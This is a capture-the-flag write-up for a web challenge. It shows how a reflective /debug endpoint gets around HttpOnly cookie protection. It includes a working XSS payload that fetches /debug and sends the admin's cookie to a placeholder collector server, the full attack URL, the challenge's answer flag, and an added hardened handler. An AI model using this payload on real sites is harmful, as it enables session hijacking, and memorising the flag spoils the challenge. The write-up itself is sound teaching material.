Zombie 201 - Web

Description

Congratulations, you got the admin’s cookie! Can you do it again? It might be a little harder this time. You are well on your way through the gauntlet. You can’t stop now.


The task is the same as in the previous part, the “Zombie 101” challenge. All the files are the same; only the configuration is different.

On line 9 of the docker-compose.yml file we can see that the configuration has changed:

configFile: '{"flag": "wctf{redacted}", "httpOnly": true, "allowDebug": true}'

In the previous part of the challenge httpOnly was set to false, which let us retrieve the admin's cookie with JavaScript (document.cookie). With httpOnly set to true the browser still attaches the cookie to requests, but scripts can no longer read it, so we need another way to get at it.

We can also see that the allowDebug option is still set to true.

Here is the /debug endpoint's code:

app.get('/debug', function(req, res) {
    if (config.allowDebug) {
        res.send({"remote-ip": req.socket.remoteAddress, ...req.headers})
    }
    else {
        res.send('sorry, debug endpoint is not enabled')
    }
})

As allowDebug is still true, we can use that endpoint to leak the admin's cookie. The HttpOnly flag only blocks script access to the cookie, not its transmission: the browser still sends the Cookie header on a same-origin fetch, and /debug reflects every request header back in the JSON body, so the cookie ends up in a response our script can read.

Let's craft our payload. We want the admin's browser to:

  1. admin fetch /debug endpoint
  2. parse result as json
  3. retrieve cookie entry
  4. exfiltrate the cookie

Here is the final payload:

// Fetch the debug page (same-origin request, so the browser attaches the admin's cookie)
fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug").then(
    function(response) {
        // get the result as JSON
        return response.json();
    }
).then(
    function(data) {
        // get the cookie entry (Node lowercases header names) and exfiltrate it
        window.location.href = "http://ourserver/?c=".concat(data['cookie']);
    }
);
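To make the leak and its fix concrete, here is an added example (my own code, not the challenge's source): a plain-function model of the Express /debug handler shown above, a hardened variant that strips credential headers before reflecting, and the client-side step the payload performs on the JSON it gets back. The request object, its headers and the collector URL are constructed for the demo; the cookie value is the placeholder from the config file, and `debugHandlerHardened` and `exfilUrlFromDebugJson` are names I chose.

```javascript
// Added example, not code from the challenge. Models the /debug handler as a
// pure function over a fake request object so it runs without Express.

// Header names that carry credentials and must never be echoed back to a page.
// Node lowercases header names in req.headers, so the set is lowercase.
const SENSITIVE_HEADERS = new Set(['cookie', 'authorization', 'proxy-authorization']);

// Same logic as the challenge handler: every request header is spread into the body,
// including the Cookie header the browser attached to the same-origin fetch.
function debugHandlerVulnerable(config, req) {
  if (!config.allowDebug) {
    return { status: 200, body: 'sorry, debug endpoint is not enabled' };
  }
  return { status: 200, body: { 'remote-ip': req.socket.remoteAddress, ...req.headers } };
}

// Hardened variant (assumption: what a fix would look like, not the challenge's code):
// drop credential-bearing headers before reflecting. Disabling allowDebug in the
// production config remains the real fix; this only limits the blast radius.
function debugHandlerHardened(config, req) {
  if (!config.allowDebug) {
    return { status: 404, body: 'not found' };
  }
  const safeHeaders = {};
  for (const [name, value] of Object.entries(req.headers)) {
    if (!SENSITIVE_HEADERS.has(name.toLowerCase())) {
      safeHeaders[name] = value;
    }
  }
  return { status: 200, body: { 'remote-ip': req.socket.remoteAddress, ...safeHeaders } };
}

// What the payload does with the parsed /debug JSON: read the lowercase 'cookie'
// key and build the exfil URL. The value is URL-encoded so '=' and ';' inside the
// cookie survive the query string (the writeup's payload concatenates it raw).
function exfilUrlFromDebugJson(debugBody, collector) {
  const cookie = debugBody && debugBody.cookie;
  if (typeof cookie !== 'string') {
    return null; // nothing leaked, e.g. the hardened handler answered
  }
  return collector + '?c=' + encodeURIComponent(cookie);
}

// Constructed sample request, standing in for what the admin's headless browser sends.
const sampleReq = {
  socket: { remoteAddress: '127.0.0.1' },
  headers: {
    host: 'zombie-201.example',                 // constructed
    cookie: 'flag=wctf{redacted}',              // placeholder value from the config file
    'user-agent': 'HeadlessChrome',             // constructed
  },
};

const leaked = debugHandlerVulnerable({ allowDebug: true }, sampleReq);
console.log('vulnerable /debug body:', leaked.body);
console.log('exfil URL:', exfilUrlFromDebugJson(leaked.body, 'http://ourserver/'));

const safe = debugHandlerHardened({ allowDebug: true }, sampleReq);
console.log('hardened /debug body:', safe.body);
console.log('exfil URL after fix:', exfilUrlFromDebugJson(safe.body, 'http://ourserver/'));
```

Run it with node. The first exfil URL carries the cookie; after the fix the cookie key is absent from the body and `exfilUrlFromDebugJson` returns null, while harmless headers such as host are still reflected.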

Send it to the admin via the /visit endpoint and get the flag :+1:

https://zombie-201-tlejfksioa-ul.a.run.app/visit?url=https://zombie-201-tlejfksioa-ul.a.run.app/zombie?show=fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug").then(function(response) {return response.json();}).then(function(data) {window.location.href = "http://ourserver/?c=".concat(data['cookie']);})

Here is the flag: wctf{h1dd3n-c00k135-d1d-n07-h31p-373964}